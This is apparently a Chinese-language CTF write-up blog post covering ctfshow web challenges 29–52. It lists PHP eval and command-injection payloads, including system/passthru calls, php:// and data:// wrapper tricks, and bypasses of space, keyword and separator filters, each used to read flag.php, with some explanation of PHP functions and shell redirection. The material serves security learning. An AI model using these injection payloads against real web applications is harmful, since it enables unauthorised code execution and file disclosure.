<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>ctfshow29-52 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="!](.&#x2F;img&#x2F;64ae6cbc-95ca-46c5-9f56-36f524cb1e94.jpg) Web29 eval函数表示把后面的内容当成php代码执行，  ?c&#x3D;include$_GET[1]?&gt;&amp;1&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;re">
<meta property="og:type" content="article">
<meta property="og:title" content="ctfshow29-52">
<meta property="og:url" content="http://example.com/2025/04/13/ctfshow29-52/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="!](.&#x2F;img&#x2F;64ae6cbc-95ca-46c5-9f56-36f524cb1e94.jpg) Web29 eval函数表示把后面的内容当成php代码执行，  ?c&#x3D;include$_GET[1]?&gt;&amp;1&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;re">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/64ae6cbc-95ca-46c5-9f56-36f524cb1e94.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/b73fb13b-b2e4-4eb4-82a9-cbd6b2f6d225.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/d359d230-d3cc-45e6-a618-2404d84895db.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/32038e0e-fe67-4653-b5e1-e81652560b33.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/daad7edc-8f4e-4598-9ded-7ec6dac8cfb4.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/9bf5bd18-acb2-4674-a5fe-8e3fdc46b8b5.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/a8e336e1-6ad1-4687-abfe-ab869ccdb701.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/a8d6efd1-702a-4b0c-ba05-50db366e5feb.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/2654fbbe-a7d5-4ab2-b9c0-8790d6e05e7d.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/35e0ef5d-1414-4704-a7a0-dd8b67a77765.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/6604ed43-bf17-4c5b-b1fb-46dd73f12222.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/a6bc6cd8-d169-447e-8103-00a611b7423e.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/a6bc6cd8-d169-447e-8103-00a611b7423e-1744549925976-13.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/78455c18-cb78-4c6e-a49e-7464ddcc5eed.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/2f3641b0-10f1-4962-b2a8-82703122f328.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/82bcfa46-9fb3-4213-b1ae-e10853679a2c.jpg">
<meta property="og:image" content="http://example.com/.com//$%7Bfiilename%7D/eec2ce71-c80c-41a0-b45e-691b2770eaff.jpg">
<meta property="article:published_time" content="2025-04-13T13:00:54.000Z">
<meta property="article:modified_time" content="2025-04-13T13:14:12.649Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/.com//$%7Bfiilename%7D/64ae6cbc-95ca-46c5-9f56-36f524cb1e94.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-ctfshow29-52" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/04/13/ctfshow29-52/" class="article-date">
  <time class="dt-published" datetime="2025-04-13T13:00:54.000Z" itemprop="datePublished">2025-04-13</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      ctfshow29-52
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><img src="/.com//$%7Bfiilename%7D/64ae6cbc-95ca-46c5-9f56-36f524cb1e94.jpg" alt="64ae6cbc-95ca-46c5-9f56-36f524cb1e94">!](.&#x2F;img&#x2F;64ae6cbc-95ca-46c5-9f56-36f524cb1e94.jpg)</p>
<p>Web29 eval函数表示把后面的内容当成php代码执行，</p>
<ol>
<li>?c&#x3D;include$_GET[1]?&gt;&amp;1&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</li>
</ol>
<p>而不能直接?c&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php 因为后面的内容不是标准的php代码</p>
<ol start="2">
<li>?c&#x3D;system(“ls”); 发现有flag.php,又system(“tac fla*”);</li>
<li>?c&#x3D;echo <code>tac fla*</code>; 注意要用<code> </code>包起来 这个反引号代替了system函数</li>
</ol>
<p><img src="/.com//$%7Bfiilename%7D/b73fb13b-b2e4-4eb4-82a9-cbd6b2f6d225.jpg" alt="b73fb13b-b2e4-4eb4-82a9-cbd6b2f6d225">!](.&#x2F;img&#x2F;b73fb13b-b2e4-4eb4-82a9-cbd6b2f6d225.jpg)</p>
<p>System被过滤也可以用passthru来替代system执行系统命令</p>
<p><img src="/.com//$%7Bfiilename%7D/d359d230-d3cc-45e6-a618-2404d84895db.jpg" alt="d359d230-d3cc-45e6-a618-2404d84895db">!](.&#x2F;img&#x2F;d359d230-d3cc-45e6-a618-2404d84895db.jpg)</p>
<p>31题 过滤了空格，可以使用%09替代；也可以使用$IFS$9，${IFS}，$IFS这三个都行</p>
<p>?c&#x3D;eval($_GET[1]);&amp;1&#x3D;passthru(“tac fla*”)；</p>
<p>?c&#x3D;eval($_GET[1]);&amp;1&#x3D;passthru(“tac${IFS}$fla*”); 注意要用转义字符\</p>
<p><img src="/.com//$%7Bfiilename%7D/32038e0e-fe67-4653-b5e1-e81652560b33.jpg" alt="32038e0e-fe67-4653-b5e1-e81652560b33">!](.&#x2F;img&#x2F;32038e0e-fe67-4653-b5e1-e81652560b33.jpg)</p>
<p>32题 ?c&#x3D;include$_GET[1]?&gt;&amp;1&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,<?php system("tac flag.php")?></p>
<p>?c&#x3D;include$_GET[1]?&gt;&amp;1&#x3D;php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;flag.php</p>
<p><img src="/.com//$%7Bfiilename%7D/daad7edc-8f4e-4598-9ded-7ec6dac8cfb4.jpg" alt="daad7edc-8f4e-4598-9ded-7ec6dac8cfb4">!](.&#x2F;img&#x2F;daad7edc-8f4e-4598-9ded-7ec6dac8cfb4.jpg)</p>
<p>38题 看到include 用伪协议 过滤了php 用data ?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,<?=system(“tac fla*”);?></p>
<p>?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,<?=system("tac fla*")?> </p>
<?=是简化的<?php echo...?>

<p><img src="/.com//$%7Bfiilename%7D/9bf5bd18-acb2-4674-a5fe-8e3fdc46b8b5.jpg" alt="9bf5bd18-acb2-4674-a5fe-8e3fdc46b8b5">!](.&#x2F;img&#x2F;9bf5bd18-acb2-4674-a5fe-8e3fdc46b8b5.jpg)</p>
<p>40题?c&#x3D;echo highlight_file(next(array_reverse(scandir(pos(localeconv())))));：这是一个GET请求的参数c，其值是一个PHP表达式。</p>
<p>echo：PHP中的输出函数，用于输出字符串或表达式的结果。</p>
<p>highlight_file：PHP中的函数，用于高亮显示PHP文件的内容。</p>
<p>next：PHP中的函数，用于将内部指针向前移动到下一个元素。</p>
<p>array_reverse：PHP中的函数，用于反转数组元素的顺序。</p>
<p>scandir：PHP中的函数，用于列出目录中的文件和子目录。</p>
<p>pos：PHP中的函数，返回数组中当前内部指针指向的值。</p>
<p>localeconv()：PHP中的函数，返回本地化的数字和货币格式信息。</p>
<p>具体来说，这段代码的执行流程如下：</p>
<p>localeconv()：获取本地化的数字和货币格式信息。</p>
<p>pos(localeconv())：获取localeconv()返回数组中当前内部指针指向的值。</p>
<p>scandir(pos(localeconv()))：列出pos(localeconv())指向的目录中的文件和子目录。</p>
<p>array_reverse(scandir(pos(localeconv())))：反转这些文件和子目录的顺序。</p>
<p>next(array_reverse(scandir(pos(localeconv()))))：将内部指针移动到下一个元素，即下一个文件或子目录。</p>
<p>highlight_file(next(array_reverse(scandir(pos(localeconv())))))：高亮显示这个文件的内容。</p>
<p>echo：输出这个高亮显示的内容。</p>
<p>payload2：</p>
<p>?c&#x3D;eval(next(reset(get_defined_vars())));&amp;1&#x3D;;system(“tac%20flag.php”);</p>
<p>1</p>
<p>payload2解释：</p>
<p>?c&#x3D;eval(next(reset(get_defined_vars())));：这是GET请求的一部分，其中c参数的值是一个PHP表达式。</p>
<p>get_defined_vars()：这个函数返回当前所有已定义变量的数组，包括局部变量和全局变量。</p>
<p>reset()：这个函数将数组内部指针指向第一个元素，并返回该元素的值。</p>
<p>next()：这个函数将数组内部指针向前移动一位，并返回当前指针处的元素值。</p>
<p>eval()：这个函数执行字符串作为PHP代码。</p>
<p>这段代码的目的是尝试执行get_defined_vars()返回的第一个元素的下一个元素的值作为PHP代码。</p>
<p>&amp;1&#x3D;;system(“tac%20flag.php”);：这是GET请求的另一部分，尝试通过URL参数执行系统命令。</p>
<p>system()：这个函数执行一个shell命令，并将完整的输出返回。</p>
<p>“tac%20flag.php”：这里的命令是tac flag.php，tac是反向输出文件内容的Unix命令，%20是URL编码的空格。</p>
<p>这段代码的目的是尝试执行flag.php文件的反向内容。</p>
<p>​            </p>
<p>原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/LongL_GuYu/article/details/140787997">https://blog.csdn.net/LongL_GuYu/article/details/140787997</a></p>
<p><img src="/.com//$%7Bfiilename%7D/a8e336e1-6ad1-4687-abfe-ab869ccdb701.jpg" alt="a8e336e1-6ad1-4687-abfe-ab869ccdb701">!](.&#x2F;img&#x2F;a8e336e1-6ad1-4687-abfe-ab869ccdb701.jpg)</p>
<p> dev&#x2F;null 2&gt;&amp;1 </p>
<p><strong>·</strong> <em><strong>*command &gt; &#x2F;dev&#x2F;null*</strong></em> ：符号 &gt; 是重定向操作符，此命令将 command 的标准输出重定向到 &#x2F;dev&#x2F;null ，即正常运行结果被丢弃。例如 echo “Hello” &gt; &#x2F;dev&#x2F;null ，屏幕上不会显示 “Hello” 。</p>
<p><strong>·</strong> <em><strong>*command 2&gt; &#x2F;dev&#x2F;null*</strong></em> ：2&gt; 用于将标准错误输出重定向，该命令会把 command 执行过程中产生的错误信息发送到 &#x2F;dev&#x2F;null 。比如 find &#x2F; -name non_existent_file 2&gt;&#x2F;dev&#x2F;null ，查找过程中因权限不足等产生的错误提示就不会显示 。</p>
<p><strong>·</strong> <em><strong>*command &gt; &#x2F;dev&#x2F;null 2&gt;&amp;1*</strong></em><em><strong>*（等价于*</strong></em> <em><strong>*command &amp;&gt; &#x2F;dev&#x2F;null*</strong></em> <em><strong>*）*</strong></em> ：</p>
<p>· &gt; 先将标准输出重定向到 &#x2F;dev&#x2F;null 。</p>
<p>· 2&gt;&amp;1 中 2 代表标准错误输出，&amp; 表示绑定，1 是标准输出，即把标准错误输出绑定到标准输出，由于标准输出已定向到 &#x2F;dev&#x2F;null ，所以标准错误输出也被定向到 &#x2F;dev&#x2F;null ，命令所有输出都被丢弃。常用于不想看到命令任何输出，或避免输出干扰、减少日志量等场景 。比如在运行一些后台脚本任务时，可让其输出不显示在终端 。</p>
<p>解法1 ?c&#x3D;ls;  ?c&#x3D;tac fla.php; ;后面为空，丢进黑洞的就是空 当用户传入 tac flag.php;ls 时，实际执行的命令变为 tac flag.php;ls &gt; &#x2F;dev&#x2F;null 2&gt;&amp;1。此时，重定向操作 &gt; &#x2F;dev&#x2F;null 2&gt;&amp;1 只对 ls 命令生效，因为它是重定向符号后面紧邻的命令，而 tac flag.php 命令不受影响，其输出会正常显示，从而绕过了 &#x2F;dev&#x2F;null 对输出的屏蔽</p>
<p>解法2 ?c&#x3D;tac flag.php||  逻辑或|| 当有一个为真则为真，A||B 若A为真，则只进行A 不管B </p>
<p>解法3  ?c&#x3D;ls%26  &amp;的URL编码是%26   在命令 ls &amp; &gt; &#x2F;dev&#x2F;null 2&gt;&amp;1 中，重定向操作 &gt; &#x2F;dev&#x2F;null 2&gt;&amp;1 是针对 &amp; 之后的部分，而 &amp; 会将 ls 命令放到后台执行，使得 ls 命令独立于重定向操作。也就是说，重定向操作无法影响到已经被放到后台执行的 ls 命令，所以 ls 命令的输出不会被重定向到 &#x2F;dev&#x2F;null，而是正常显示出来。 &amp; 也可以看作是命令分隔符的一种特殊形式。它和分号 ; 类似，都能分隔多个命令，但 &amp; 会让前面的命令在后台运行。</p>
<p>?c&#x3D;ls%26%26 同理</p>
<p>逻辑与运算符&amp;&amp; 条件1&amp;&amp;条件2 当1为真继续2 若1为假 则2就不管了 </p>
<p>按位与运算符&amp; 用于对两个整数的二进制位进行逐位比较。只有当两个对应位都为 1 时，结果的该位才为 1，否则为 0。</p>
<p>当用于布尔值时，&amp; 也可以作为逻辑与运算符，但它不具有短路特性。无论第一个表达式的结果如何，都会计算第二个表达式。</p>
<p>解法4 ?c&#x3D;ls%0a  ?c&#x3D;tac flag.php%0a 在 URL 编码里，%0a 代表换行符（\n） 换行符 \n 在 Unix&#x2F;Linux 系统的命令行里是命令的分隔符。所以，上述命令会先执行 ls 命令，该命令用于列出当前目录下的文件和文件夹。</p>
<p>换行之后，&gt; &#x2F;dev&#x2F;null 2&gt;&amp;1 成为了另一个独立的命令。但这个命令并没有实际的命令主体，它只是一个空的重定向操作。</p>
<p><img src="/.com//$%7Bfiilename%7D/a8d6efd1-702a-4b0c-ba05-50db366e5feb.jpg" alt="a8d6efd1-702a-4b0c-ba05-50db366e5feb">!](.&#x2F;img&#x2F;a8d6efd1-702a-4b0c-ba05-50db366e5feb.jpg)</p>
<p>43 过滤了; tac flag.php|| 或者%0a 或者&amp; URL编码后%26 </p>
<p><img src="/.com//$%7Bfiilename%7D/2654fbbe-a7d5-4ab2-b9c0-8790d6e05e7d.jpg" alt="2654fbbe-a7d5-4ab2-b9c0-8790d6e05e7d">!](.&#x2F;img&#x2F;2654fbbe-a7d5-4ab2-b9c0-8790d6e05e7d.jpg)</p>
<p>44 ?c&#x3D;tac fla*||</p>
<p><img src="/.com//$%7Bfiilename%7D/35e0ef5d-1414-4704-a7a0-dd8b67a77765.jpg" alt="35e0ef5d-1414-4704-a7a0-dd8b67a77765">!](.&#x2F;img&#x2F;35e0ef5d-1414-4704-a7a0-dd8b67a77765.jpg)</p>
<p>45 过滤了空格用%09 ${IFS} ?c&#x3D;tac${IFS}fla*||</p>
<p><img src="/.com//$%7Bfiilename%7D/6604ed43-bf17-4c5b-b1fb-46dd73f12222.jpg" alt="6604ed43-bf17-4c5b-b1fb-46dd73f12222">!](.&#x2F;img&#x2F;6604ed43-bf17-4c5b-b1fb-46dd73f12222.jpg)</p>
<p>46 过滤了空格数字  用%09 这里的 %09 被当作普通空白符处理 $被过滤 不能用${IFS} 空格还可以用&lt;或者&lt;&gt;代替空格</p>
<p>?c&#x3D;tac%09fla?.php|| 过滤了* 用?也可以代替任意一个字符 </p>
<p><img src="/.com//$%7Bfiilename%7D/a6bc6cd8-d169-447e-8103-00a611b7423e.jpg" alt="a6bc6cd8-d169-447e-8103-00a611b7423e">!](.&#x2F;img&#x2F;a6bc6cd8-d169-447e-8103-00a611b7423e.jpg)</p>
<p>47 ?c&#x3D;tac%09fla?.php||  绕过flag还可以用f’’lag  在正则匹配中?代表通配符 但在正则匹配中 ?表示前面一个字符出现零次或一次</p>
<p>48 49同上</p>
<p><img src="/.com//$%7Bfiilename%7D/a6bc6cd8-d169-447e-8103-00a611b7423e-1744549925976-13.jpg" alt="a6bc6cd8-d169-447e-8103-00a611b7423e">!](.&#x2F;img&#x2F;a6bc6cd8-d169-447e-8103-00a611b7423e.jpg)</p>
<p>49 这里过滤了09 所以不能用%09代表空格 之前过滤%和数字 %09仍能用 过滤规则只是简单地查找并移除单个的百分号和数字字符，没有对连续的 %XX （XX 为十六进制数字）形式进行处理。所以 %09 会被当作普通字符序列保留下来，没有被过滤掉。</p>
<p><img src="/.com//$%7Bfiilename%7D/78455c18-cb78-4c6e-a49e-7464ddcc5eed.jpg" alt="78455c18-cb78-4c6e-a49e-7464ddcc5eed">!](.&#x2F;img&#x2F;78455c18-cb78-4c6e-a49e-7464ddcc5eed.jpg)</p>
<p>50 ?c&#x3D;tac&lt;fla’’g.php|| </p>
<p><img src="/.com//$%7Bfiilename%7D/2f3641b0-10f1-4962-b2a8-82703122f328.jpg" alt="2f3641b0-10f1-4962-b2a8-82703122f328">!](.&#x2F;img&#x2F;2f3641b0-10f1-4962-b2a8-82703122f328.jpg)</p>
<p>51  ?c&#x3D;t’’ac&lt;fl’’ag.php%0a 过滤了tac 用t’’ac</p>
<p>nl、more 和 vi 命令都可以用于查看文件内容，但在功能和使用方式上有所不同：</p>
<p><strong>·</strong> <em><strong>*nl*</strong></em> <em><strong>*命令*</strong></em>：主要用于显示文件内容，并为每行加上行号。例如，执行 nl file.txt 会将 file.txt 的内容逐行显示出来，同时在每行前面加上对应的行号，方便用户对文件中的行进行定位和引用。</p>
<p><strong>·</strong> <em><strong>*more*</strong></em> <em><strong>*命令*</strong></em>：用于分页显示文件内容。当文件内容较多，一屏无法完全显示时，more 会将文件内容按页显示，用户可以通过按空格键或回车键等方式逐页或逐行查看文件内容。例如，more large_file.txt 会以分页的形式显示 large_file.txt 的内容，便于用户查看。</p>
<p><strong>·</strong> <em><strong>*vi*</strong></em> <em><strong>*命令*</strong></em>：不仅可以查看文件内容，还能对文件进行编辑。使用 vi 打开文件后，默认处于命令模式，用户可以通过各种命令进行光标移动、文本查找等操作来查看文件内容。若要对文件进行修改，则需进入插入模式。例如，vi config.php 可以打开 config.php 文件进行查看和编辑。</p>
<p><img src="/.com//$%7Bfiilename%7D/82bcfa46-9fb3-4213-b1ae-e10853679a2c.jpg" alt="82bcfa46-9fb3-4213-b1ae-e10853679a2c">!](.&#x2F;img&#x2F;82bcfa46-9fb3-4213-b1ae-e10853679a2c.jpg)</p>
<p>52 ?c&#x3D;nl${IFS}&#x2F;fla’’g%0a &lt;被过滤 用${IFS}&#x2F; </p>
<p><img src="/.com//$%7Bfiilename%7D/eec2ce71-c80c-41a0-b45e-691b2770eaff.jpg" alt="eec2ce71-c80c-41a0-b45e-691b2770eaff">!](.&#x2F;img&#x2F;eec2ce71-c80c-41a0-b45e-691b2770eaff.jpg)</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/04/13/ctfshow29-52/" data-id="cm9nzkfqg0004nouo1cthbyj1" data-title="ctfshow29-52" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2025/04/13/web29/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          web29
        
      </div>
    </a>
  
  
    <a href="/2025/04/13/ctfshow%20web29-52%20(%E9%83%A8%E5%88%86%EF%BC%89/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/04/">April 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/04/19/web80/">web80</a>
          </li>
        
          <li>
            <a href="/2025/04/19/web78/">web78</a>
          </li>
        
          <li>
            <a href="/2025/04/19/yy/">yy</a>
          </li>
        
          <li>
            <a href="/2025/04/19/some/">some</a>
          </li>
        
          <li>
            <a href="/2025/04/19/you/">you</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>